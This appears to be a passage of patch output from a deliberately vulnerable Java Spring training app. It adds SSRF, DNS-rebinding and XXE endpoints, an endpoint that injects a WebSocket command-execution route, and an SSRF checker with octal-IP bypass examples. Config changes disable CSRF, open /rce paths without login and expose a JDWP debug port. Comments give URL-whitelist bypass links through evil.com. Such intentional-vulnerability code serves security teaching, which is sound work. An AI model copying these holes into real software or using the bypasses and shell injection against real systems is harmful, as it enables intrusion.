+     * UserAgent is <code>Java/1.8.0_102</code>. <br>
+     * <a href="http://localhost:8080/ssrf/IOUtils/sec?url=http://www.baidu.com">http://localhost:8080/ssrf/IOUtils/sec?url=http://www.baidu.com</a>
      */
     @GetMapping("/IOUtils/sec")
     public String IOUtils(String url) {
@@ -274,10 +269,10 @@ public String HttpSyncClients(@RequestParam("url") String url) {
 
 
     /**
-     * http://127.0.0.1:8080/ssrf/restTemplate/vuln1?url=http://www.baidu.com <p>
-     * Only support HTTP protocol. <p>
-     * Redirects: GET HttpMethod follow redirects by default, other HttpMethods do not follow redirects<p>
-     * User-Agent: Java/1.8.0_102 <p>
+     * Only support HTTP protocol. <br>
+     * GET HttpMethod follow redirects by default, other HttpMethods do not follow redirects. <br>
+     * User-Agent is Java/1.8.0_102. <br>
+     * <a href="http://127.0.0.1:8080/ssrf/restTemplate/vuln1?url=http://www.baidu.com">http://127.0.0.1:8080/ssrf/restTemplate/vuln1?url=http://www.baidu.com</a>
      */
     @GetMapping("/restTemplate/vuln1")
     public String RestTemplateUrlBanRedirects(String url){
@@ -296,12 +291,9 @@ public String RestTemplateUrl(String url){
 
 
     /**
-     * http://127.0.0.1:8080/ssrf/hutool/vuln?url=http://www.baidu.com <p>
-     * UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool<p>
-     * Redirects: Do not follow redirects <p>
-     *
-     * @param url url
-     * @return contents of url
+     * UserAgent is Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool.
+     * Do not follow redirects. <br>
+     * <a href="http://127.0.0.1:8080/ssrf/hutool/vuln?url=http://www.baidu.com">http://127.0.0.1:8080/ssrf/hutool/vuln?url=http://www.baidu.com</a>
      */
     @GetMapping("/hutool/vuln")
     public String hutoolHttp(String url){
@@ -309,4 +301,18 @@ public String hutoolHttp(String url){
     }
 
 
+    /**
+     * DnsRebind SSRF in java by setting ttl is zero. <br>
+     * <a href="http://localhost:8080/ssrf/dnsrebind/vuln?url=http://test.joychou.org">http://localhost:8080/ssrf/dnsrebind/vuln?url=dnsrebind_url</a>
+     */
+    @GetMapping("/dnsrebind/vuln")
+    public String DnsRebind(String url) {
+        java.security.Security.setProperty("networkaddress.cache.negative.ttl" , "0");
+        if (!SecurityUtil.checkSSRFWithoutRedirect(url)) {
+            return "Dangerous url";
+        }
+        return HttpUtil.get(url);
+    }
+
+
 }
diff --git a/src/main/java/org/joychou/controller/WebSockets.java b/src/main/java/org/joychou/controller/WebSockets.java
new file mode 100644
index 00000000..6a477ece
--- /dev/null
+++ b/src/main/java/org/joychou/controller/WebSockets.java
@@ -0,0 +1,76 @@
+package org.joychou.controller;
+
+import org.apache.tomcat.websocket.server.WsServerContainer;
+import org.joychou.config.WebSocketsProxyEndpoint;
+import org.joychou.config.WebSocketsCmdEndpoint;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.ServletContext;
+import javax.servlet.http.HttpServletRequest;
+import javax.websocket.server.ServerContainer;
+import javax.websocket.server.ServerEndpointConfig;
+
+
+@RestController
+public class WebSockets {
+
+    /**
+     * <p>动态添加WebSockets实现命令执行</p>
+     * <p>
+     * 1. WebSocket的端口和Spring端口一致。<br>
+     * 2. 如果应用需要登录，动态添加的WebSocket路由不能要求被登录，否则添加失败。
+     * </p>
+     * <p>
+     *    <a href="http://localhost:8080/websocket/cmd?path=/ws/shell">http://localhost:8080/websocket/cmd?path=/ws/shell</a> <br>
+     *    WebSockets 的URL为ws://127.0.0.1:8080/ws/shell
+     * </p>
+     * <p>JoyChou @ 2023年02月20日 </p>
+     */
+    @RequestMapping("/websocket/cmd")
+    public String cmdInject(HttpServletRequest req) {
+        String path = req.getParameter("path");
+        if (path == null) {
+            return "path is null";
+        }
+        ServletContext sc = req.getServletContext();
+        try {
+            ServerEndpointConfig sec = ServerEndpointConfig.Builder.create(WebSocketsCmdEndpoint.class, path).build();
+            WsServerContainer wsc = (WsServerContainer) sc.getAttribute(ServerContainer.class.getName());
+            if (wsc.findMapping(path) == null) {
+                wsc.addEndpoint(sec);
+                System.out.println("[+] Websocket: " + path + " inject success!!!");
+                return "[+] Websocket: " + path + " inject success!!!";
+            } else {
+                System.out.println("[-] Websocket: " + path + " has been injected!");
+                return "[-] Websocket: " + path + " has been injected!";
+            }
+        } catch (Exception e) {
+            return e.toString();
+        }
+    }
+
+    @RequestMapping("/websocket/proxy")
+    public String proxyInject(HttpServletRequest req) {
+        String path = req.getParameter("path");
+        if (path == null) {
+            return "path is null";
+        }
+        ServletContext sc = req.getServletContext();
+        try {
+            ServerEndpointConfig sec = ServerEndpointConfig.Builder.create(WebSocketsProxyEndpoint.class, path).build();
+            WsServerContainer wsc = (WsServerContainer) sc.getAttribute(ServerContainer.class.getName());
+            if (wsc.findMapping(path) == null) {
+                wsc.addEndpoint(sec);
+                System.out.println("[+] Websocket: " + path + " inject success!!!");
+                return "[+] Websocket: " + path + " inject success!!!";
+            } else {
+                System.out.println("[-] Websocket: " + path + " has been injected!");
+                return "[-] Websocket: " + path + " has been injected!";
+            }
+        } catch (Exception e) {
+            return e.toString();
+        }
+    }
+
+}
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 931a5688..14b6a232 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -252,8 +252,9 @@ public String DocumentBuilderVuln01(HttpServletRequest request) {
             sr.close();
             return buf.toString();
         } catch (Exception e) {
+            e.printStackTrace();
             logger.error(e.toString());
-            return EXCEPT;
+            return e.toString();
         }
     }
 
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index 9d90c698..414fd24d 100644
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -34,6 +34,11 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
     @Value("${joychou.security.csrf.exclude.url}")
     private String[] csrfExcludeUrl;
 
+
+    @Value("${joychou.no.need.login.url}")
+    private String[] noNeedLoginUrl;
+
+
     @Value("${joychou.security.csrf.method}")
     private String[] csrfMethod = {"POST"};
 
@@ -69,7 +74,7 @@ protected void configure(HttpSecurity http) throws Exception {
 
         // spring security login settings
         http.authorizeRequests()
-                .antMatchers("/css/**", "/js/**").permitAll() // permit static resources
+                .antMatchers(noNeedLoginUrl).permitAll() // no need to login page
                 // CVE-2022-22978漏洞代码
                 .regexMatchers("/black_path.*").denyAll()    // 如果正则匹配到/black_path，则forbidden
                 .anyRequest().authenticated().and() // any request authenticated except above static resources
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 0930e2b5..70f744ad 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -16,7 +16,8 @@
 
 public class SSRFChecker {
 
-    private static Logger logger = LoggerFactory.getLogger(SSRFChecker.class);
+    private static final Logger logger = LoggerFactory.getLogger(SSRFChecker.class);
+    private static String decimalIp;
 
     public static boolean checkURLFckSSRF(String url) {
         if (null == url) {
@@ -125,7 +126,7 @@ public static boolean isInternalIpByUrl(String url) {
      * @param strIP ip字符串
      * @return 如果是内网ip，返回true，否则返回false。
      */
-    static boolean isInternalIp(String strIP) {
+    public static boolean isInternalIp(String strIP) {
         if (StringUtils.isEmpty(strIP)) {
             logger.error("[-] SSRF check failed. IP is empty. " + strIP);
             return true;
@@ -144,15 +145,43 @@ static boolean isInternalIp(String strIP) {
 
     }
 
+
     /**
-     * host转换为IP
-     * 会将各种进制的ip转为正常ip
-     * 167772161 转换为  10.0.0.1
-     * 127.0.0.1.xip.io 转换为 127.0.0.1
+     * Convert host to decimal ip.
+     * Since there is a bypass in octal using {@link InetAddress#getHostAddress()},
+     * the function of converting octal to decimal is added.
+     * If it still can be bypassed, please submit
+     * <a href="https://github.com/JoyChou93/java-sec-code/pulls">PullRequests</a> or
+     * <a href="https://github.com/JoyChou93/java-sec-code/issues">Issues</a>.<br>
      *
-     * @param host 域名host
+     * <p>Normal:</p>
+     * <ul>
+     *    <li>69299689 to 10.23.78.233</li>
+     *    <li>69299689 to 10.23.78.233 </li>
+     *    <li>012.0x17.78.233 to 10.23.78.233 </li>
+     *    <li>012.027.0116.0351 to 10.23.78.233</li>
+     *    <li>127.0.0.1.xip.io to 127.0.0.1</li>
+     *    <li>127.0.0.1.nip.io to 127.0.0.1</li>
+     * </ul>
+
+     * <p>Bypass: </p>
+     * <ul>
+     *     <li>01205647351 to 71.220.183.247, actually 10.23.78.233</li>
+     *     <li>012.23.78.233 to 12.23.78.233, actually 10.23.78.233</li>
+     * </ul>
+     * @return decimal ip
      */
-    private static String host2ip(String host) {
+    public static String host2ip(String host) {
+
+        if (null == host) {
+            return "";
+        }
+
+        // convert octal to decimal
+         if(isOctalIP(host)) {
+             host = decimalIp;
+         }
+
         try {
             InetAddress IpAddress = InetAddress.getByName(host); //  send dns request
             return IpAddress.getHostAddress();
@@ -161,14 +190,90 @@ private static String host2ip(String host) {
         }
     }
 
+
     /**
-     * 从URL中获取host，限制为http/https协议。只支持http:// 和 https://，不支持//的http协议。
-     *
-     * @param url http的url
+     * Check whether the host is an octal IP, if so, convert it to decimal.
+     * @return Octal ip returns true, others return false. 012.23.78.233 return true. 012.0x17.78.233 return false.
+     */
+    public static boolean isOctalIP(String host) {
+        String[] ipParts = host.split("\\.");
+        StringBuilder newDecimalIP = new StringBuilder();
+        boolean is_octal = false;
+
+        // Octal ip only has number and dot character.
+        if (isNumberOrDot(host)) {
+
+            if (ipParts.length != 1 && ipParts.length != 4) {
+                return false;
+            }
+
+            // 000000001205647351
+            if( ipParts.length == 1 && host.startsWith("0") ) {
+                decimalIp = Integer.valueOf(host, 8).toString();
+                return true;
+            }
+
+            // 0000012.23.78.233
+            for(String ip : ipParts) {
+                if (!isNumber(ip)){
+                    throw new SSRFException("Illegal host: " + host + ".");
+                }
+                if (ip.startsWith("0")) {
+                    if (Integer.valueOf(ip, 8) >= 256){
+                        throw new SSRFException("Illegal host: " + host + ".\t" + ip + " is above 255.");
+                    }
+                    newDecimalIP.append(Integer.valueOf(ip, 8)).append(".");
+                    is_octal = true;
+                }else{
+                    if (Integer.valueOf(ip, 10) >= 256) {
+                        throw new SSRFException("Illegal host: " + host + ".\t" + ip + " is above 255.");
+                    }
+                    newDecimalIP.append(ip).append(".");
+                }
+            }
+            decimalIp = newDecimalIP.substring(0, newDecimalIP.lastIndexOf("."));
+        }
+        return is_octal;
+    }
+
+    /**
+     * Check string is a number.
+     * @return If string is a number 0-9, return true. Otherwise, return false.
+     */
+    private static boolean isNumber(String str) {
+        if (null == str || "".equals(str)) {
+            return false;
+        }
+        for (int i = 0; i < str.length(); i++) {
+            char ch = str.charAt(i);
+            if (ch < 48 || ch > 57) {
+                return false;
+            }
+        }
+        return true;
+    }
+
+
+    /**
+     * Check string is a number or dot.
+     * @return If string is a number or a dot, return true. Otherwise, return false.
+     */
+    private static boolean isNumberOrDot(String s) {
+        for (int i = 0; i < s.length(); i++) {
+            char ch = s.charAt(i);
+            if ((ch < 48 || ch > 57) && ch != 46){
+                return false;
+            }
+        }
+        return true;
+    }
+
+    /**
+     * Get host from URL which the protocol must be http:// or https:// and not be //.
      */
     private static String url2host(String url) {
         try {
-            // 使用URI，而非URL，防止被绕过。
+            // use URI instead of URL
             URI u = new URI(url);
             if (SecurityUtil.isHttp(url)) {
                 return u.getHost();
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 96ca82c3..d5c6d5ab 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,5 +1,5 @@
 
-spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?AllowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC
+spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?allowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC
 spring.datasource.username=root
 spring.datasource.password=woshishujukumima
 spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
@@ -14,7 +14,7 @@ endpoints.enabled=true
 
 # logging.config=classpath:logback-online.xml
 
-# 业务的callback参数，不支持多个
+# jsonp callback parameter
 joychou.business.callback = callback_
 
 
@@ -28,19 +28,30 @@ joychou.security.referer.uri = /jsonp/**
 
 ### csrf configuration begins ###
 # csrf token check
-joychou.security.csrf.enabled = true
+joychou.security.csrf.enabled = false
 # URI without CSRF check (only support ANT url format)
-joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /xstream/**, /ssrf/**
+joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /xstream/**, /ssrf/**, /deserialize/**
 # method for CSRF check
 joychou.security.csrf.method = POST
 ### csrf configuration ends ###
 
 
-### jsonp configuration begins ###  # auto convert json to jsonp
+### jsonp configuration begins ###
+# auto convert json to jsonp
 # referer check
 joychou.security.jsonp.referer.check.enabled = true
 joychou.security.jsonp.callback = callback, _callback
 ### jsonp configuration ends ###
 
 # swagger
-swagger.enable = true
\ No newline at end of file
+swagger.enable = true
+
+
+### no need to login page begins ###
+joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**
+### no need to login page ends ###
+
+
+
+# http header max size
+#server.max-http-header-size=30000

From 621c30050f82379afe1e2e6d4ff66c1234f33913 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 15 Mar 2023 18:55:18 +0800
Subject: [PATCH 093/108] Add XXE

---
 docker-compose.yml                            |  4 +-
 java-sec-code.iml                             | 20 +++--
 pom.xml                                       | 18 ++++
 .../org/joychou/controller/URLWhiteList.java  | 19 +++--
 src/main/java/org/joychou/controller/XXE.java | 82 ++++++++-----------
 .../joychou/security/ssrf/SSRFChecker.java    | 31 +++----
 src/main/java/org/joychou/util/HttpUtils.java |  1 -
 src/main/java/org/joychou/util/WebUtils.java  |  5 +-
 8 files changed, 98 insertions(+), 82 deletions(-)

diff --git a/docker-compose.yml b/docker-compose.yml
index cb3f8efa..7e9c878e 100644
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -1,9 +1,11 @@
-version : '2'
+version : '3'
 services:
     jsc:
         image: joychou/jsc:latest
+        command: ["java", "-Xdebug", "-Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=0.0.0.0:8000", "-jar", "jsc.jar"]
         ports:
             - "8080:8080"
+            - "8000:8000"
         links:
             - j_mysql
 
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 6e093293..a20476ae 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -38,13 +38,13 @@
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:1.5.1.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: ch.qos.logback:logback-classic:1.1.9" level="project" />
     <orderEntry type="library" name="Maven: ch.qos.logback:logback-core:1.1.9" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:jcl-over-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.slf4j:log4j-over-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:8.5.11" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:8.5.11" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:8.5.11" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:8.5.85" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-annotations-api:8.5.85" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:8.5.85" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:8.5.85" level="project" />
     <orderEntry type="library" name="Maven: org.hibernate:hibernate-validator:5.3.4.Final" level="project" />
     <orderEntry type="library" name="Maven: javax.validation:validation-api:1.1.0.Final" level="project" />
     <orderEntry type="library" name="Maven: org.jboss.logging:jboss-logging:3.3.0.Final" level="project" />
@@ -127,7 +127,7 @@
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-multibindings:4.0" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-grapher:4.0" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-assistedinject:4.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.ow2.asm:asm:5.0.4" level="project" />
+    <orderEntry type="library" name="Maven: org.ow2.asm:asm:5.0.4" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.woodstox:woodstox-core-asl:4.4.1" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: javax.xml.stream:stax-api:1.0-2" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.woodstox:stax2-api:3.1.4" level="project" />
@@ -170,8 +170,8 @@
     <orderEntry type="library" name="Maven: commons-httpclient:commons-httpclient:3.1" level="project" />
     <orderEntry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-starter:1.3.2" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-jdbc:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-jdbc:8.5.11" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-juli:8.5.11" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-jdbc:8.5.85" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-juli:8.5.85" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-jdbc:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-tx:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-autoconfigure:1.3.2" level="project" />
@@ -222,5 +222,11 @@
     <orderEntry type="library" name="Maven: com.auth0:java-jwt:4.0.0" level="project" />
     <orderEntry type="library" name="Maven: cn.hutool:hutool-all:5.8.10" level="project" />
     <orderEntry type="library" name="Maven: org.javassist:javassist:3.27.0-GA" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.data:spring-data-commons:1.13.11.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.slf4j:jcl-over-slf4j:1.7.22" level="project" />
+    <orderEntry type="library" name="Maven: com.jayway.jsonpath:json-path:2.2.0" level="project" />
+    <orderEntry type="library" name="Maven: net.minidev:json-smart:2.2.1" level="project" />
+    <orderEntry type="library" name="Maven: net.minidev:accessors-smart:1.1" level="project" />
+    <orderEntry type="library" name="Maven: org.xmlbeam:xmlprojector:1.4.13" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 43c5b99a..9ee03372 100644
--- a/pom.xml
+++ b/pom.xml
@@ -12,6 +12,7 @@
     <properties>
         <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
         <maven.compiler.target>1.8</maven.compiler.target>
+        <tomcat.version>8.5.85</tomcat.version>
     </properties>
 
 
@@ -312,6 +313,23 @@
             <version>3.27.0-GA</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.springframework.data</groupId>
+            <artifactId>spring-data-commons</artifactId>
+            <version>1.13.11.RELEASE</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.jayway.jsonpath</groupId>
+            <artifactId>json-path</artifactId>
+        </dependency>
+
+        <dependency>
+            <groupId>org.xmlbeam</groupId>
+            <artifactId>xmlprojector</artifactId>
+            <version>1.4.13</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index 35d37576..156cc73d 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -6,7 +6,8 @@
 import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.*;
 
-import java.net.MalformedURLException;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
 import java.net.URL;
 import java.util.ArrayList;
 import java.util.regex.Matcher;
@@ -86,20 +87,21 @@ public String regex(@RequestParam("url") String url) {
 
 
     /**
-     * The bypass of using <code>java.net.URL</code> to getHost.
+     * The bypass of using {@link java.net.URL} to getHost.
      * <p>
-     * Bypass poc1: curl -v 'http://localhost:8080/url/vuln/url_bypass?url=http://evel.com%5c@www.joychou.org/a.html'
-     * Bypass poc2: curl -v 'http://localhost:8080/url/vuln/url_bypass?url=http://evil.com%5cwww.joychou.org/a.html'
+     * <a href="http://localhost:8080/url/vuln/url_bypass?url=http://evil.com%5c@www.joychou.org/a.html">bypass 1</a>
+     * <a href="http://localhost:8080/url/vuln/url_bypass?url=http://evil.com%5cwww.joychou.org/a.html">bypass 2</a>
+     *
      * <p>
-     * More details: https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass
+     * <a href="https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass">More details</a>
      */
     @GetMapping("/vuln/url_bypass")
-    public String url_bypass(String url) throws MalformedURLException {
+    public void url_bypass(String url, HttpServletResponse res) throws IOException {
 
         logger.info("url:  " + url);
 
         if (!SecurityUtil.isHttp(url)) {
-            return "Url is not http or https";
+            return;
         }
 
         URL u = new URL(url);
@@ -109,11 +111,10 @@ public String url_bypass(String url) throws MalformedURLException {
         // endsWith .
         for (String domain : domainwhitelist) {
             if (host.endsWith("." + domain)) {
-                return "Good url.";
+                res.sendRedirect(url);
             }
         }
 
-        return "Bad url.";
     }
 
 
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 14b6a232..36372727 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -4,6 +4,9 @@
 import org.dom4j.io.SAXReader;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
+import org.springframework.data.web.ProjectedPayload;
+import org.springframework.http.HttpEntity;
+import org.springframework.http.ResponseEntity;
 import org.springframework.web.bind.annotation.*;
 
 import javax.servlet.http.HttpServletRequest;
@@ -27,6 +30,7 @@
 import org.apache.commons.digester3.Digester;
 import org.jdom2.input.SAXBuilder;
 import org.joychou.util.WebUtils;
+import org.xmlbeam.annotation.XBRead;
 
 /**
  * Java xxe vuln and security code.
@@ -38,8 +42,8 @@
 @RequestMapping("/xxe")
 public class XXE {
 
-    private static Logger logger = LoggerFactory.getLogger(XXE.class);
-    private static String EXCEPT = "xxe except";
+    private static final Logger logger = LoggerFactory.getLogger(XXE.class);
+    private static final String EXCEPT = "xxe except";
 
     @PostMapping("/xmlReader/vuln")
     public String xmlReaderVuln(HttpServletRequest request) {
@@ -226,16 +230,15 @@ public String DigesterSec(HttpServletRequest request) {
     }
 
 
-    // 有回显
-    @RequestMapping(value = "/DocumentBuilder/vuln01", method = RequestMethod.POST)
+    /**
+     * Use request.getInputStream to support UTF16 encoding.
+     */
+    @RequestMapping(value = "/DocumentBuilder/vuln", method = RequestMethod.POST)
     public String DocumentBuilderVuln01(HttpServletRequest request) {
         try {
-            String body = WebUtils.getRequestBody(request);
-            logger.info(body);
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             DocumentBuilder db = dbf.newDocumentBuilder();
-            StringReader sr = new StringReader(body);
-            InputSource is = new InputSource(sr);
+            InputSource is = new InputSource(request.getInputStream());
             Document document = db.parse(is);  // parse xml
 
             // 遍历xml节点name和value
@@ -249,7 +252,6 @@ public String DocumentBuilderVuln01(HttpServletRequest request) {
                     buf.append(String.format("%s: %s\n", node.getNodeName(), node.getTextContent()));
                 }
             }
-            sr.close();
             return buf.toString();
         } catch (Exception e) {
             e.printStackTrace();
@@ -258,43 +260,6 @@ public String DocumentBuilderVuln01(HttpServletRequest request) {
         }
     }
 
-
-    // 有回显
-    @RequestMapping(value = "/DocumentBuilder/vuln02", method = RequestMethod.POST)
-    public String DocumentBuilderVuln02(HttpServletRequest request) {
-        try {
-            String body = WebUtils.getRequestBody(request);
-            logger.info(body);
-
-            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
-            DocumentBuilder db = dbf.newDocumentBuilder();
-            StringReader sr = new StringReader(body);
-            InputSource is = new InputSource(sr);
-            Document document = db.parse(is);  // parse xml
-
-            // 遍历xml节点name和value
-            StringBuilder result = new StringBuilder();
-            NodeList rootNodeList = document.getChildNodes();
-            for (int i = 0; i < rootNodeList.getLength(); i++) {
-                Node rootNode = rootNodeList.item(i);
-                NodeList child = rootNode.getChildNodes();
-                for (int j = 0; j < child.getLength(); j++) {
-                    Node node = child.item(j);
-                    // 正常解析XML，需要判断是否是ELEMENT_NODE类型。否则会出现多余的的节点。
-                    if (child.item(j).getNodeType() == Node.ELEMENT_NODE) {
-                        result.append(String.format("%s: %s\n", node.getNodeName(), node.getFirstChild()));
-                    }
-                }
-            }
-            sr.close();
-            return result.toString();
-        } catch (Exception e) {
-            logger.error(e.toString());
-            return EXCEPT;
-        }
-    }
-
-
     @RequestMapping(value = "/DocumentBuilder/Sec", method = RequestMethod.POST)
     public String DocumentBuilderSec(HttpServletRequest request) {
         try {
@@ -447,6 +412,31 @@ private static void response(NodeList rootNodeList){
         }
     }
 
+        /**
+         * Receiving POST requests supporting both JSON and XML.
+         * CVE-2018-1259
+         */
+        @PostMapping(value = "/xmlbeam/vuln")
+        HttpEntity<String> post(@RequestBody UserPayload user) {
+            try {
+                logger.info(user.toString());
+                return ResponseEntity.ok(String.format("hello, %s!", user.getUserName()));
+            }catch (Exception e){
+                e.printStackTrace();
+                return ResponseEntity.ok("error");
+            }
+        }
+
+        /**
+         * The projection interface using XPath and JSON Path expression to selectively pick elements from the payload.
+         */
+        @ProjectedPayload
+        public interface UserPayload {
+            @XBRead("//userName")
+            String getUserName();
+        }
+
+
     public static void main(String[] args)  {
     }
 
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 70f744ad..71abc91e 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -157,7 +157,6 @@ public static boolean isInternalIp(String strIP) {
      * <p>Normal:</p>
      * <ul>
      *    <li>69299689 to 10.23.78.233</li>
-     *    <li>69299689 to 10.23.78.233 </li>
      *    <li>012.0x17.78.233 to 10.23.78.233 </li>
      *    <li>012.027.0116.0351 to 10.23.78.233</li>
      *    <li>127.0.0.1.xip.io to 127.0.0.1</li>
@@ -166,8 +165,10 @@ public static boolean isInternalIp(String strIP) {
 
      * <p>Bypass: </p>
      * <ul>
-     *     <li>01205647351 to 71.220.183.247, actually 10.23.78.233</li>
-     *     <li>012.23.78.233 to 12.23.78.233, actually 10.23.78.233</li>
+     *     <li>01205647351 {@link InetAddress#getHostAddress()} result is 71.220.183.247, actually 10.23.78.233</li>
+     *     <li>012.23.78.233 {@link InetAddress#getHostAddress()} result is 12.23.78.233, actually 10.23.78.233</li>
+     *     <li>012.23.233 {@link InetAddress#getHostAddress()} result is  12.23.0.233, actually 10.23.0.233</li>
+     *     <li>012.233 {@link InetAddress#getHostAddress()} result is 12.0.0.233, actually 10.0.0.233</li>
      * </ul>
      * @return decimal ip
      */
@@ -177,13 +178,14 @@ public static String host2ip(String host) {
             return "";
         }
 
-        // convert octal to decimal
+         // convert octal to decimal
          if(isOctalIP(host)) {
              host = decimalIp;
          }
 
         try {
-            InetAddress IpAddress = InetAddress.getByName(host); //  send dns request
+            // send dns request
+            InetAddress IpAddress = InetAddress.getByName(host);
             return IpAddress.getHostAddress();
         } catch (Exception e) {
             return "";
@@ -203,30 +205,31 @@ public static boolean isOctalIP(String host) {
         // Octal ip only has number and dot character.
         if (isNumberOrDot(host)) {
 
-            if (ipParts.length != 1 && ipParts.length != 4) {
-                return false;
+            // not support ipv6
+            if (ipParts.length > 4) {
+                throw new SSRFException("Illegal ipv4: " + host);
             }
 
-            // 000000001205647351
+            // 01205647351
             if( ipParts.length == 1 && host.startsWith("0") ) {
                 decimalIp = Integer.valueOf(host, 8).toString();
                 return true;
             }
 
-            // 0000012.23.78.233
+            // 012.23.78.233
             for(String ip : ipParts) {
                 if (!isNumber(ip)){
-                    throw new SSRFException("Illegal host: " + host + ".");
+                    throw new SSRFException("Illegal ipv4: " + host);
                 }
                 if (ip.startsWith("0")) {
                     if (Integer.valueOf(ip, 8) >= 256){
-                        throw new SSRFException("Illegal host: " + host + ".\t" + ip + " is above 255.");
+                        throw new SSRFException("Illegal ipv4: " + host);
                     }
                     newDecimalIP.append(Integer.valueOf(ip, 8)).append(".");
                     is_octal = true;
                 }else{
                     if (Integer.valueOf(ip, 10) >= 256) {
-                        throw new SSRFException("Illegal host: " + host + ".\t" + ip + " is above 255.");
+                        throw new SSRFException("Illegal ipv4: " + host);
                     }
